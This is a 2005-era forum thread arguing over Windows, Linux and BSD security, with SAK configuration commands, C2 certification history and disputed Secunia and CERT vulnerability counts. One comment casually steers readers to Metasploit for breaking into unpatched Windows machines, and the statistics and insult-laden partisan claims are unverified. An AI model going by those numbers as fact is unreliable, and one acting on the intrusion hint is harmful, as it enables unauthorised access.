And just issuing a Ctrl+alt+del when you are going to login will do nothing if you are in the real login screen or show you the, e.g., KDE logout screen to let you logout from the current session or shutdown the machine if you can.
> Correct me if i’m wrong, but remote clients use
> another X instance, like :1
> So killing the current X instance doesn’t affect
> remote clients.
Hmm.. I don’t think so. I think the X server itself is shared. Maybe not though.
> And just issuing a Ctrl+alt+del when you are going
> to login will do nothing if you are in the real
> login screen or show you the, e.g., KDE logout
> screen to let you logout from the current session
> or shutdown the machine if you can.
True. There should be a way to enforce it on public terminals though, such as those in University computer science labs, where CSci seniors with too much time on their hands might decide to give incoming clueless freshmen a harsh lesson in “security by experience” for example.
Well, I remember Windows used to accept only 11 chars (I think) and forget the others. What’s important is that an OS can evolve without too much hasle, without breaking all things out there.
About passwords, well, who knows if we are still going to use them in a couple of years instead of biometrics. So the systems will need to evolve. I can think the current MD5 scheme for storing string passwords will be used to store fingerprints of fingerprints
> About passwords, well, who knows if we are still
> going to use them in a couple of years instead
> of biometrics.
I ain’t switching to biometrics. Not giving anyone a reason to cut off my fingers and steal them :p
Well, good biometric systems not only take account of your fingerprints, but also if you finger is alive
What’s nice is you cannot forget your finger or your eye globe and call admin to reset your password.
Edited 2005-12-13 00:34
And where would the *BSD’s be in that respect? Near the bottom of the list no doubt.
> And where would the *BSD’s be in that respect?
> Near the bottom of the list no doubt.
In what respect? Security? Typically the BSDs come in as some of the most secure operating systems available. That’s not necessarily because they are inherantly more secure. But most likely because they are not as popular, so they aren’t nearly as often the target of root kits as Linux is. OS/2 also comes in as one of the most secure operating systems available. Since not many people use it, not many people are playing with it and trying to figure out how to crack it.
What key sequence should you use?
Well, CTRL-ALT-DEL is used to reboot the machine.
CTRL-ALT-BACKSPACE is magical to the X server.
We’ll choose CTRL-ALT-PAUSE.
In your rc.sysinit (or rc.local) file, add the command
echo “control alt keycode 101 = SAK” | /bin/loadkeys
And that’s it! Only the superuser may reprogram the SAK key.
On the PC keyboard, SAK kills all applications which have
/dev/console opened.
Unfortunately this includes a number of things which you don’t
actually want killed. This is because these applications are
incorrectly holding /dev/console open. Be sure to complain to your
Linux distributor about this!
You can identify processes which will be killed by SAK with the
command
# ls -l /proc/[0-9]*/fd/* | grep console
l-wx—— 1 root root 64 Mar 18 00:46 /proc/579/fd/0 -> /dev/console
Then:
# ps aux|grep 579
root 579 0.0 0.1 1088 436 ? S 00:43 0:00 gpm -t ps/2
Taken from linux documentation : SAK.txt. Do it if you want to implement Ctr+Alt+Del behaviour seen on Windows.
>True. It’s an issue that is easily solved in Windows. The weakness is that Microsoft has never warned users about the dangers of running as the administrator, and has never prompted users during the setup to create an account for every day use that does not have admin privileges like most Linux installs do. That’s something Microsoft should change.<
Microsoft dosen’t warn it’s users because it believes it will be an inconvenience to users and thus make other alternatives not look so bad.
Many windows users would trip out the first time they are prompted for an administrator password to install software. Perhaps they would find they are locked out from a certain directory or file, joe twentyforepack would freek.
Point is, Microsoft dosen’t care about what is best for their customers, they care about the bottom line. If Windows was made to run in a more secure manner, it may feel more nix like (passwords to install software, and access certain directories) which would make a switch easier to swollow for the average user which is the last thing Microsoft wants (remember lock in)
The only reason Microsoft is advertising security for Vista is because it is a huge buzzword right now. If the buzzword was purple chimpanzee, Microsoft would be all over that (“get the facts, we have the chimp”), even if the chimp was really green, bald, and sterol.
Ya right microsoft security… The microsoft PR machine tried to sell NT as orange book but it was really red book security. If you do more research the only way microsoft could be orange book certfied was to turn off the nic, modem, cdom, floppy. Go ahead do some research. Seems that microsoft is up to its old game and the younger generation is full of bullshit. The unix os can be secure. Even thought you would find it in the papers the US Navy uses SGI machines to protect the coasts. Not going to tell you how but they would not do it with microsoft. I just don’t think the education system is doing its job. But the Pac-Rim countries will. Long live the stupid engineer. Physics without math.
1.1 Orange book, red book and C2 security
The so called orange book is part of the DoD “rainbow” series of books. The official name is Department of Defense Trusted Computer System Evaluation Criteria. There is another book, a red one, which is a “interpretation” of the Orange Book. The NCSC has published a number of different interpretations of the TCSEC. These interpretations clarify Orange Book requirements with respect to specific system components. The formal name of the red book is the NCSC’s Trusted Network Interpretation of the Trusted Computer System Evaluation Criteria. It is an interpretation of Orange Book security requirements as they would be applied to the networking component of a secure system. The Red Book does not change the original requirements, it simply describes how a network system should operate in order to meet Orange Book requirements for a C2 secure system.
Microsoft had a certain version of Windows NT, with a specific configuration, on a specific hardware platform evaluated by NSA. The outcome was that that specific setup is considered C2 compliant and the NSA guys from the National Computer Security Center, NCSC, also wrote a report entitled the NSA?s Final Evaluation Report on Microsoft. Inc.: Windows NT Workstation and Server Version 3.5 with U.S. Service Pack 3. National Computer Security Center, 23 June 1995.
The people at National Computer Security Center have an online description of the Microsoft NT evaluation, (http://www.radium.ncsc.mil/tpep/epl/entries/CSC-EPL-95-003.html) including information on what type of hardware was used during the test. They have an general page on evaluation ,http://www.radium.ncsc.mil/tpep, and a frequently asked question, FAQ, area (http://www.radium.ncsc.mil/tpep/process/faq.html).
The evaluation was just according to the orange book, not the red book. Microsoft has since them continued the evaluation process to also match the red book (i.e. networking parts) criterias, but this is not yet finalized.
To have a C2 compliant setup, you must amongst other things have
• Identification and Authentication mechanisms
• Discretionary Access Control mechanisms
• Auditing
• Object Reuse
In practice, it also means that you have to
• Turn off networking completely (since NT is just evaluated to the orange book, not the red)
• Disable floppy disk
• Change the standard file system permissions to be more restrictive
• Change a lot of permissions in the registry
That leaves you a not so usable client-server system. There is a tool that come with the resource kit called c2config that you might use to harden your system to a C2 level. You might also want to see Microsoft’s web page entitled What is C2 Evaluation? Microsoft Sets the Record Straight (http://www.microsoft.com/syspro/technet/boes/winnt/nt351/c2bltn.htm).
There is an on-line html version (http://www.pinsight.com:80/~royg/security/dod/rainbow.html) available of the rainbow series books that you might want to check out. Microsoft has a blurb that describes the characteristics of a secure system – C2 and beyond (http://www.microsoft.com/ntserver/c2char.htm).
There is a paper on a new information technology security standard called common criteria (http://csrc.ncsl.nist.gov/nistpubs/cc) that is available on-line. It is a proposed ISO-standard.
it seems very strange that microsoft’s servers run linux rather than microsofts own.
its almost as if microsoft doesn’t have any faith in its own operating system. hardly surprising, though. if microsft doesn’t, what makes them think that anyone else should?
> it seems very strange that microsoft’s servers
> run linux rather than microsofts own.
Stop pulling shit out of your ass! Find me one shread of evidence that Microsoft’s servers are running Linux. Netcraft says they are running Windows 2003.
It never ceases to amaze me the kind of downright bullshit that Linux zealots will put out of their ass to attempt to boost their own platform and make Microsoft look bad.
netcraft claim that microsft uses windows you say? now whos pulling shit out of their ass?
“According to a post on the Netcraft Web site, Microsoft changed its DNS settings on Friday so that requests for http://www.microsoft.com no longer resolve to machines on Microsoft’s own network, but instead are handled by the Akamai caching system, which runs Linux. ”
“As of this writing, Netcraft reports that http://www.microsoft.com is still running on Linux, although microsoft.com is reported as running on Windows Server 2003. ”
http://castlecops.com/article2811.html
And as of this writing, Netcraft’s history report on http://www.microsoft.com shows it is currently running Windows Server 2003 on IIS, and has been going as far back as Netcraft keeps records. There is not one single Linux entry in there. Same story for microsoft.com, msdn.com, http://www.msdn.com
Thanks for playing. But you lose. Sorry.
Hotmail ran on linux servers for a bit I think. But of course, Microsoft bought Hotmail and ended up making the transition to windows.
Also, Microsoft sometimes relies on a third-party for content delivery (akamai I think?) which may have servers that run on *nix.
> Hotmail ran on linux servers for a bit I think.
Hotmail ran on FreeBSD when Microsoft bought it. They did finally manage to convert it to Windows though. But they did have problems for a while getting Windows to handle the kinds of loads that FreeBSD handled with relative ease.
Ahh right. I knew it was a unix variant at least
no, i win. you only decided to scratch the surface. you forgot to look a bit deeper into it. you will then discover that MS does indeed use linux on many of its ervers and network equipment.
“no, i win. you only decided to scratch the surface. you forgot to look a bit deeper into it. you will then discover that MS does indeed use linux on many of its servers and network equipment.”
Source please. And no, I don’t mean a two year old article that you try to pass off as current information. And I don’t mean trying to claim that Microsoft’s servers are running on Linux, when even that article only claimed their servers were behind a content caching system running on Linux.
so you you know the part about MS using linux for some of its servers. i will grant you your wish of providing the source that MS is even recommending linux above windows for some networks. here is one:
“The next time Bill Gates sends an e-mail through Microsoft’s shiny new Wireless LAN it will be passed through a behind-the-scenes Linux-based network appliance.
Earlier this year Microsoft and Aruba Networks jointly announced the two companies will work to replace Microsoft’s existing Cisco wireless network with Aruba’s centrally-managed infrastructure, which eliminates the need for individual changes on the access points.
Aruba Networks was selected to provide the networking equipment for what is considered to be one of the world’s largest next-generation wireless LANs, serving more than 25,000 simultaneous users a day in some 60 countries. According to an Aruba press statement, Microsoft’s new WLAN will be deployed in 277 buildings covering more than 17 million square feet using Aruba mobility controllers, mobility software and some 5000 wireless access points.
What the press statement didn’t mention is that Aruba mobility controllers run the Linux operating system which Microsoft has aggressively targeted as being inferior to Windows as part of its “Get the Facts” marketing campaign.
Mark Robards, Aruba Network’s Asia-Pacific vice president, said the company’s mobility controller switches provide integrated security, including a firewall, VPN, and hardware encryption, and they are “all Linux-based”.
Robards said the network rollout with Microsoft is going well and is likely to take two years to complete and will contain as many as 7000 access points. Indeed, Aruba is recruiting Linux developers to work on its mobility controller software. In an advertisement on the company’s Web site, Aruba is seeking a senior Linux software engineer with “expert knowledge of Linux and extensive Linux kernel experience”.
Sunjeev Pandey, senior director of Microsoft IT, said the company is “pleased to be partnering with Aruba in the upgrade of Microsoft’s next-generation wireless LAN”.
“This partnership will allow Microsoft to leverage a cutting-edge wireless and mobility platform that provides us the scalability, performance and security that our environment demands,” Pandey said.
Pandey’s appraisal of Aruba’s technology is in stark contrast to Microsoft’s “Get the Facts” rhetoric which places Windows as a more secure, and higher-performing choice over Linux.”
http://www.computerworld.com.au/index.php/id;754084996;fp;16;fpid;0
> i will grant you your wish of providing the source
> that MS is even recommending linux above windows
> for some networks. here is one.
Ah… Now the truth comes out. And also the truth that you were spinning it. You claimed that Microsoft was running Linux on their servers. But neither article you have pointed too claims that. So now lets look at your second one:
1: A router is not a server
2: Microsoft has never ever claimed that Windows Server 2003 was for building wireless routers.
3: You are talking about an embedded kernel here being used to power a network appliance. Which is VASTLY different than a full blown server.
“Wouldn’t Any Other System be as Vulnerable?
That’s Microsoft’s official line, but it isn’t true. While every system is vulnerable to attack, the ease with which Windows systems can be compromised, the number of vulnerabilities, and the speed with which attacks can propagate are unique to Windows.
For a concrete example showing the defect in Microsoft’s argument, look at Internet Web servers. The open source Apache Web server running primaily on open source Linux and BSD operating systems has more than twice the market share of Windows and IIS (Internet Information Server), yet it’s the Microsoft products that have earned a reputation for poor security.
A recent Linux worm was listed as infecting “1 to 5 computers”. A really bad Linux worm (Slasher) infected less than 6000 (vs. hundreds of thousands within hours for a typical Windows worm) and was easily eradicated (A8). BSD Unix servers have an even better record. There are millions of Linux and BSD computers fully exposed to the Internet – the Internet runs on them.
Let me be clear that other system can be made insecure through intent or stupidity. A prime example is “lowest cost” systems from WalMart running the Lindows version of Linux. Lindows imitates Windows “ease of use” by encouraging regular users to run as root – the worst security mistake you can possibly make on a Unix/Linux system. Even so, they’re not as bad as Windows because they lack the “tight integration” and automation tools Windows comes with.
Security problems with Windows are legion, and many experts consider it too broken to fix, ever. Windows was created as a single user system unconnected to any network, never mind one as dangerous as the Internet. It was designed to be “feature rich” and “user friendly”, fully integrating all computing functions “seamlessly”, with no barriers. All the tools a worm or virus writer needs are included in Windows by default. More and more network functions continue to be integrated deeply into Windows (to lock out competitors) with few if any safeguards.
Microsoft completely ignored security until recently by their own admission, because “people wouldn’t pay for it”. The only reason they’re paying lip service to it now is because it’s become a major public relations problem. A system with this heritage can’t be fixed retroactively, and exposing Windows computers to the Internet is not prudent.”
“Perhaps this is why, according to Netcraft, 47 of the top 50 web sites with the longest running uptime (times between reboots) run Apache. [2] None of the top 50 web sites runs Windows or Microsoft IIS. So if it is true that malicious hackers attack the most numerous software platforms, that raises the question as to why hackers are so successful at breaking into the most popular desktop software and operating system, infect 300,000 IIS servers, but are unable to do similar damage to the most popular web server and its operating systems?”
“The United States Computer Emergency Readiness Team (CERT) uses its own set of metrics to evaluate the severity of any given security flaw. A number between 0 and 180 expresses the final metric, where the number 180 represents the most serious vulnerability. The ranking is not linear. In other words, a vulnerability ranked 100 is not twice as serious as a vulnerability ranked at 50.
CERT considers any vulnerability with a score of 40 or higher to be serious enough to be a candidate for a special CERT Advisory and US-CERT technical alert.
We queried the CERT database using the search terms “Microsoft”, “Red Hat”, and “Linux”. [9] While the CERT web search capabilities do not produce perfectly desirable results in terms of granularity or longevity. This is especially true for the search results for “Red Hat” and “Linux”. The “Linux” search results include a number of Oracle security vulnerabilities that are common to Linux, UNIX, and Windows. The details of the most severe “Red Hat” entry does not even list Red Hat as a vulnerable system. The results for the “Microsoft” search seem to be almost entirely accurate, inasmuch as both the details and entries refer to flaws in Microsoft-specific software. As a result, the results are somewhat unfairly skewed against Linux and Red Hat. Nevertheless, even if one takes the results at face value and ignores the skewed results for Linux and Red Hat, Microsoft still produces the most entries in the CERT database, and the list of entries contain the most severe flaws.
The CERT results for “Microsoft” returned 250 entries, with the top two entries containing the severity metric of 94.5. Thirty-nine entries have a severity rating of 40 or greater. The average severity rating for the top 40 entries is 54.67. (We chose to average 40 entries instead of 50 or more because the Red Hat search only returned 49 results.)
The CERT results for “Red Hat” returned 46 entries. The top entry has a severity metric of 108.16. Only 3 (vs. 39 for Microsoft) entries have a metric of 40 or greater. The average severity for the top 40 entries is 17.96.
The CERT results for the “Linux” search returned 100 entries. The top entry has a severity metric of 87.72. Only 6 of the entries carry a severity metric of 40 or greater. The average severity for the top 40 entries is 28.48.
These results cannot be expected to mirror our own analysis of recent vulnerability patches. The CERT search criteria and date ordering is different, and the CERT search does not confine the products to Windows Server 2003 and Red Hat Enterprise Linux AS v.3. But the CERT results reflect how Windows security flaws tend to be far more frequently severe than those of Linux, which echoes our conclusions.”
http://www.theregister.co.uk/security/security_report_windows_vs_li…
I can spin numbers too. One of the most respected Security sites, Secunia, looks something like the following when it comes to security advisories:
Windows: 594
Linux: 4159
FreeBSD: 90
Solaris: 231
Oops…. So much for your idea that Linux is more secure than Windows. In fact, it is the worst by far.
yeah, right. we believe you.
You don’t have to believe me. You can look it up yourself.
Oh, and just to better match CERT study you quoted, I ran the searches again, but this time only reporting the number of vulnerabilities marked “highly critical” and “extremely critical”:
Linux: 884
Windows: 141
FreeBSD: 18
Solaris: 37
Even when it comes to only highly critical and extremely critical vulnerabilities, Linux is still the worst by far.
Oh. And guess what? IIS is more secure than Apache too. One again, only highly critical and extremely critical vulnerabilities:
IIS: 13
Apache: 53
But if you were really following this stuff, you would know that there hasn’t been a single highly critical or extremely critical security vulnerability reported in IIS 6 for over a year. The last one was in November of 2004. The most recent one in Apache, however, was October 5th of this year.
source please?
you forgot to read this:
“But the CERT results reflect how Windows security flaws tend to be far more frequently severe than those of Linux, which echoes our conclusions”
> source please?
I told you the source. Secunia.
“But the CERT results reflect how Windows security flaws tend to be far more frequently severe than those of Linux, which echoes our conclusions”
No, I did read that. Which is why I re-ran the searches and searched for only vulnerabilities classified as highly critical and extremely critical. Even after doing that, Windows came out with only 141 compared compared to Linux’s 884. That pretty much rejects the findings of the article you quoted because I only recorded very critical vulnerabilties when I obtained those numbers.
“I told you the source. Secunia. ”
thats not good enough. link, please?
> thats not good enough. link, please?
god you are lame.
Did it ever occur to you that it just might be http://www.secunia.com?
I love people who claim to know what they are talking about, but don’t even know how to use a Web browser. Or did it ever occur to you that entering Secunia in google might turn up something?
“Did it ever occur to you that it just might be http://www.secunia.com?
I love people who claim to know what they are talking about, but don’t even know how to use a Web browser. Or did it ever occur to you that entering Secunia in google might turn up something?”
i’m not the one thats lame, IP 24.118.179.
i want you to provide the direct links so that everyone else can see the small print, and not the figures that you’ve given that can easily be misconstrued in favour of windows.
you seem very reluctant to do so, so what does that tell everyone about the truthfulness of those figures that you give?
> i want you to provide the direct links so that
> everyone else can see the small print, and not
> the figures that you’ve given that can easily
> be misconstrued in favour of windows.
If you can’t figure out how to enter search terms in Secunia’s search engine, than I’m not even going to have this discussion with you, since you obviously aren’t even capable of doing an Internet search. I even gave you the search terms I used.
“If you can’t figure out how to enter search terms in Secunia’s search engine, than I’m not even going to have this discussion with you, since you obviously aren’t even capable of doing an Internet search. I even gave you the search terms I used.”
the direct link is not for me, its for the readers. there must be a reason why you refuse to provide a direct link to show these mythical figures of yours supposedly claiming that windows has any security advantage whatsoever, when the reverse case of linux being considerably more secure than windows IN REALITY has been provided for all to see. until you do provide your link, you words are just that: mere hollow meaningless words.
I provided you a link, and I gave you the search terms I used for it.
http://secunia.com/search/?adv_search=1&s=1&search=linux&w=0&vuln_t…
http://secunia.com/search/?adv_search=1&s=1&search=Windows&w=0&vuln…
Those are the Linux and Windows ones. You can do the FreeBSD and the Solaris ones yourself if you want them.
And by the way, where do Linux zealots get the idea that there are no viruses for Linux? There are over 3,000 of them according to Secunia. That’s less than Windows 12,000. But still plenty, and definately not “no viruses”.
And by the way, yes even if you limit the search to only the field that says which OS the bug affects, and to highly critical and extremely critical vulnerabilities, Linux has over 700. Windows only a little over 50.
hehe you really are that naive, aren’t you. those figures merely state of the presence of virii, not if they have had any effect on the given OS’s.
so its back to square one for you. you must try harder next time.
> hehe you really are that naive, aren’t you.
Nope. Not naive at all.
And it is you who must try harder. Please provide your data that refutes the numbers I gave you. So far you haven’t.
Face it. Linux has over 10 times the number of reported vulnerabilities of a highly critical or extremely critical nature than Windows does. Sorry. I know the truth hurts. But that is the truth. Deal with it.
i don’t have to deal with the fact that linux is unquestionably more secure than windows. you do.
i’ll refer you to one of many previous post that you have forgotten about (selectively reading again):
“The CERT results for “Microsoft” returned 250 entries, with the top two entries containing the severity metric of 94.5. Thirty-nine entries have a severity rating of 40 or greater. The average severity rating for the top 40 entries is 54.67. (We chose to average 40 entries instead of 50 or more because the Red Hat search only returned 49 results.)
“The CERT results for “Red Hat” returned 46 entries. The top entry has a severity metric of 108.16. Only 3 (vs. 39 for Microsoft) entries have a metric of 40 or greater. The average severity for the top 40 entries is 17.96.
The CERT results for the “Linux” search returned 100 entries. The top entry has a severity metric of 87.72. Only 6 of the entries carry a severity metric of 40 or greater. The average severity for the top 40 entries is 28.48.
These results cannot be expected to mirror our own analysis of recent vulnerability patches. The CERT search criteria and date ordering is different, and the CERT search does not confine the products to Windows Server 2003 and Red Hat Enterprise Linux AS v.3. But the CERT results reflect how Windows security flaws tend to be far more frequently severe than those of Linux, which echoes our conclusions.”
you’ll see things in their true light one day (i hope, for your sake). bye bye.
> I don’t have to deal with the fact that linux
> is unquestionably more secure than windows. you do.
Sorry. You are denying reality. I gave you RAW HARD DATA. Linux has over 10 TIMES as many security vulnerabilities with a highly critical or extremely critical rating than Windows does. I even played with multiple settings to see if there was any possible way I got reduce that ratio, for the benefit of those who want to believe that Linux is more secure. But no matter how I tried to reduce the numbers, I couldn’t Linux always came out running roughly 10 times higher than Windows.
> you’ll see things in their true light one
> day (i hope, for your sake). bye bye.
I already see the truth. Linux has new security vulunerabilities found more often then any other major OS in common use today. That’s the truth according to the graphs at Secunia.
And like I said, I am not a Windows fanboy. Since I will freely acknowledge that Solaris and FreeBSD both come in much better than Windows. But Linux is by far the absolute worst. But a factor of 10. That is the simple truth. I’m sorry you can’t accept it.
And no, I did not ignore the previous posts. I stated that they data I was able to come up with, does not support the claims made in those posts, or those articles. And as someone who has a degree in a science field, I reject claims I cannot indepedantly verify with data. And the data simply does not support the claims made in those posts or those articles. Even when limitting the data to show only highly critical and extremely critical vulnerabilities.
And by the way, given that Secunia is a *very* prominant source for security information and often the first to report new vulnerabilities, I would have thought you would have already know what I was talking about.
dearest IP: 24.118.179
selective reading won’t get you very far. you also forgot to read this:
“Perhaps this is why, according to Netcraft, 47 of the top 50 web sites with the longest running uptime (times between reboots) run Apache. [2] None of the top 50 web sites runs Windows or Microsoft IIS. So if it is true that malicious hackers attack the most numerous software platforms, that raises the question as to why hackers are so successful at breaking into the most popular desktop software and operating system, infect 300,000 IIS servers, but are unable to do similar damage to the most popular web server and its operating systems?”
dearest IP: 81.76.38
Please tell me how uptime and hacking have any relationship to each other whatsoever? To suggest they do is a complete logical falacy. And anyone who would suggest that is either intentionally spinning the argument, or doesn’t even understand logic 101.
And if you want to play that game, not one of the top 50 sites with the longest uptime is running your precious Linux either.
Point and click your way into most average 2000/XP computer: http://www.metasploit.com/
95/98/ME are so easy they don’t even count.
ANY MORON can simply download metasploit, and with a friendly HTML page to walk them through it – walk right into all but the most hardened (and completely up to date) systems.
Try doing that with Linux. I’ve tried. It isn’t nearly as easy, even using tools such as this.
So is this worse than what a renowned company does to promote it’s OS throwing BS to Linux?
Newsflash.
Windows is closed source
Linux is open source
Windows code isn’t available and therefor, you cannot find security holes easily.
Linux applications for the most part is open source, and therfeor, security holes are found way more rapidly, and fixed.
So saying IIS only has X# of security problems compared to Apache having X# of security problems is ridiculous and retarded.
I’m gonna get dizzy if you try to put anymore spin on that.
FreeBSD is open source too. And it has a mere fraction of the reported vulnerabilities that Linux does. Solaris recently went open source as well. And still only has a mere fraction.
Sorry, but your argument doesn’t hold water. If what you suggest is true, FreeBSD and Solaris should have a much higher number of reported vulnerabilities thant they do. But they don’t.
I was sure it ran Solaris.
That’s because source code is available for anyone to look at. But that doesn’t mean there are no more critical vulnerabilities hidden in Windows or IIS code. There are lots of them, for sure, just not yet discovered.
Please, Linux is way more popular on the desktop front, and has way more hackers going at it then BSD or Solaris.
Also, look at what the hacks can do compared to windows. Such as the argument with FireFox VS IE.
The worst that can happen with FireFox in 99% of all cases is that FireFox goes down. With IE they ruin your system.
Same goes with probably a good 90% of all OSS apps compared to windows vulnerabilities.
“Please, Linux is way more popular on the desktop front, and has way more hackers going at it then BSD or Solaris.”
Doesn’t matter. Is till doesn’t make up for the vast descrepency of 90 vs more than 4,000. Even when weighed proportionally with the number of users.
“The worst that can happen with FireFox in 99% of all cases is that FireFox goes down. With IE they ruin your system.”
Not even remotely true. Firefox has been plagued recently with a string of exploitable vulnerabilities that allowed execution of arbitrary code.
And vulnerabilities on Secunia do not get classifed as highly critical or extremely critical unless they are capable of doing serious damage to your system. So again, your argument doesn’t hold up cause Linux has far more of them then any other operating system I compared it to.
He was talking about Apache. And it’s true it’s the more common web server in the whole internet. So why is not the most hacked? You know the answer, don’t try to disguise it covering the facts with other questions or responding indirectly. Your arguments are invalid, if I can say you are argumenting, because you aren’t, you just change the topic and try anything else. Those who know cannot be fooled.
“And it’s true it’s the more common web server in the whole internet. So why is not the most hacked? ”
Ah, but it *is* the most cracked.
The vast majority of Web site defacings occur on Web sites running Apache. Not Web sites running IIS.
“Your arguments are invalid, if I can say you are argumenting”
My arguments are not invalid. I have given you hard data. You have given me nothing and backed up nothing.
“Those who know cannot be fooled.”
Except you can’t provide a source for your knowledge. You don’t know. you buy into FOSS rhetoric without doing any real research of your own. And then when I point out the real facts to you, you deny them and don’t want to accept the truth.
Perhaps security advisors are concentrating on what’s being used the most. This is Windows and Linux.
“Ah, but it *is* the most cracked. ”
That’s what you think. Please provide some facts.
“The vast majority of Web site defacings occur on Web sites running Apache. Not Web sites running IIS.”
i have seen IIS sites taken down by script kiddies. I had an Apache running in my port 80 and monitored it for a long time. All logs where filled with exploits for IIS (that didn’t work, of course). It was never cracked. And you said uptime is irrelevant, but it IS relevant. In the event of a crack/compromise, what a system admin would do is reinstall the whole OS. So, there you have your uptime telling you for how long they were running without problems. Those sites you said were cracked were mostly PHP sites, but not cracked for Apache vulnerabilities, but PHP ones. And that’s not really a problem, because Apache doesn’t run as root, so what you could get is a hacked page that says: DiZ Pa6e WaZ HaCKeD by Stupid!!!
“y arguments are not invalid. I have given you hard data. You have given me nothing and backed up nothing.”
Hard data my ass!! I haven’t seen a single significant link. Just accusations.
“Except you can’t provide a source for your knowledge. You don’t know. you buy into FOSS rhetoric without doing any real research of your own. And then when I point out the real facts to you, you deny them and don’t want to accept the truth.”
Public knowledge. Everyone knows. There isn’t FOSS rhetoric, there is a lot of Commercial Software rhetoric, I don’t need to point that.
I have pointed out real facts. As you say. It is you who don’t want to accept the truth. I don’t buy your anti-foss propaganda.
I know every software is vulnerable and has been cracked before. That’s not the point. The point is how much damage caused those vulnerabilities. Prove I’m wrong.
“And you said uptime is irrelevant, but it IS relevant. In the event of a crack/compromise, what a system admin would do is reinstall the whole OS. So, there you have your uptime telling you for how long they were running without problems.”
Uptime is related to OS reinstalls? Oh now you are really digging deep to try to suppor your position… Lets see… The last time I rebooted my Web server it had nothing to do with a being cracked, or even with an OS problem… It was a drive replacement… So much for your uptime meaning shit when it comes to OS reliabilitiy / Web server reliability.
“Hard data my ass!! I haven’t seen a single significant link. Just accusations.”
Bullshit. I provided statistics taken from Secunia, and a link to the Secunia site so you can verify them yourself. The simple fact is that Linux has a much higher reported number of highly critical and extremely critical vulnerabilities than Windows or even other versions Of Unix do, open source or not. and that it has those vulnerabilities reported more often than Windows and other versions of Unix. I only brought that up to discredit the bullshit article quoting the Cern stuff that was mentioned here. (And this was originally about Linux vs. Windows btw, not Apache vs. IIS. So don’t accuse me of trying to change the subject by bringing it back to Windows vs. Linux).
You can spin this however you want. Doesn’t change the numbers. Linux has a much higher numbewr of reported highly critical and extremely critical vulnerabilities. And they are reported more often.
“Public knowledge. Everyone knows. There isn’t FOSS rhetoric, there is a lot of Commercial Software rhetoric, I don’t need to point that.”
Ah yes… the “Public knowledge” defense to back up claims you can’t prove. Another typical defense of a FOSS zealot. And yes, there is FOSS rhetoric. That’s about all people like RSS and ESR spew is rhetoric.
“I have pointed out real facts”
No, you haven’t. You haven’t provided a single piece of data to support your claims. Not one. You can’t call them facts when you can’t even support them with data. So I call your facts rhetoric. You haven’t provided a single piece of data to back them up.
I have provided you with security vulnerability numbers from a highly prominant security site to back up my claims. Which is far more data than you have provided.
“The point is how much damage caused those vulnerabilities. Prove I’m wrong.”
Prove you are right. So far you haven’t provided any data to support your claims. Again, I have provided data that shows Linux has a much higher number of highly critical and extremely critical vulnerabilities than Windows does. That’s raw, hard data. You have provided me with nothing except rhetoric that when I ask you to prove you say “It’s public knowledge. I don’t need to prove it.”
“I don’t buy your anti-foss propaganda.”
No anti-foss propeganda. Just facts.
My data also showed that FreeBSD (a foss project) fared the best of all. I didn’t try to dispute those numbers. All I did was refute the claim posted that Windows had a much higher rate of critical vulnerabilities than Linux did. The numbers show that simply isn’t true. The truth is quite the opposite in fact.
Oh, and if you don’t want take Secunia as a reliable source, check out the plugin database for the Nessus network security vulnerabilty scanner. I can tell you in advance what you will find though cause I have set up Nessus on networks before: The number of plugins scanning for vulnerabilities that affect Linux systmes is much higher than the number of plugins scanning for vulnerabilities that affect Windows systems. Because quite simply, there are more vulnerabilities to scan for on Linux systems than on Windows systems.
Um.. check zone-h.org
There ARE more defacements on apache servers than IIS servers. Why, I won’t get into. But don’t spout your crap that IIS is cracked more when you have no data to back it up at ALL and there is hard data to the contrary.
Yes of course it is , but who is still able to understand anything in the linux kernel….
Are you?
It’s a litle bit stupid to believe that MS programmer are worth than other.And as a matter of fact linux is highly vugnerable. There are no virus against it, but one day it will be and this day will be a disaster.
It is also impossible to compare *BSD and linux, one is made as a profestional os, the other is still basicaly as hobby os which became an incredible success.
So you are a FreeBSD guy after all and don’t like Linux position. Stop trolling.
I am not trolling. The people who claim that Windows is “so insecure you won’t believe it” are the ones trolling. Because as I pointed out, the data tells a very different story. Sorry. That’s the truth. I’m not trolling for pointing out the truth. I’m trolling in your mind because you don’t like the truth.
and wheres the link to this truth? or are you going to continue to pull figures outta your ass forever?
“You can spin this however you want. Doesn’t change the numbers. Linux has a much higher numbewr of reported highly critical and extremely critical vulnerabilities. And they are reported more often.”
you have already seen this part, yet you have deliberately forgotten about it:
“But the CERT results reflect how Windows security flaws tend to be far more frequently severe than those of Linux, which echoes our conclusions”
No. I DID NOT forget about it, as I already pointed out.
This is specifically why I ran the the search using only vulnerabilities classified as highly critical and extremely critical. Windows still came out looking way better than Linux.
But I pointed that out already a few posts back, which apparnently you decided to ignore since you don’t like what it implies.
yet another example showing the unyeilding failing of microsoft technology. i will quote IP 24.118.179’s beloved source too: secuna.
“Mozilla Firefox 1.x with all vendor patches installed and all vendor workarounds applied, is currently affected by one or more Secunia advisories rated Less critical ”
http://secunia.com/product/4227/
“Microsoft Internet Explorer 6.x with all vendor patches installed and all vendor workarounds applied, is currently affected by one or more Secunia advisories rated Extremely critical”
http://secunia.com/product/11/?period=2005#statistics
(IP 24.118.179: do you see what this is? it is whats commenly refered to as a link. something that you’re ill-acquainted with)
> yet another example showing the unyeilding failing
> of microsoft technology.
Ah yes… Linux zealot strategy number 36: “Keep trying to change the focus to one product that is particuarily troubled. That way we can take the focus off the fact that Microsoft’s overall security track record is way better than Linux”.
This was never about IE vs. Firefox. It was about Linux vs. Windows, and a bit of a side thread about IIS vs. Apache.
With Microsoft’s dismal track record of security, I’ll take this article with a huge lump of salt. I’m not closed minded to the fact that Vista may be the change that we all seek from Microsoft, but until then I have a poor opinion of Windows after adminitrating hundreds of Windows computers which have proven to be rather troublesome. The real proof in the pudding as they say is will Windows TCO and security problems become lower than Unix, Mac OSX and Linux ?
I’ll wait to see if Vista passes for secure and then deploy it with IE reenabled after I’m convinced Microsoft made all the right steps.
Currently IE is disabled on most of our Windows computers due to security problems that have plagued us in the past.
“BUT THE CERT RESULTS REFLECT HOW WINDOWS SECURITY FLAWS TEED TO BE FAR MORE FREQUENTLY SEVERE THAN THOSE OF LINUX, WHICH ECHOES OUR CONCLUSIONS”
NOW WHO IS DOING SELECTIVE READING? HOW MANY TIMES DO I HAVE TO POINT OUT THAT I HAVE ADDRESSED THAT ISSUE THREE TIMES ALREADY BEFORE IT SINKS INTO YOUR DENSE SKULL?
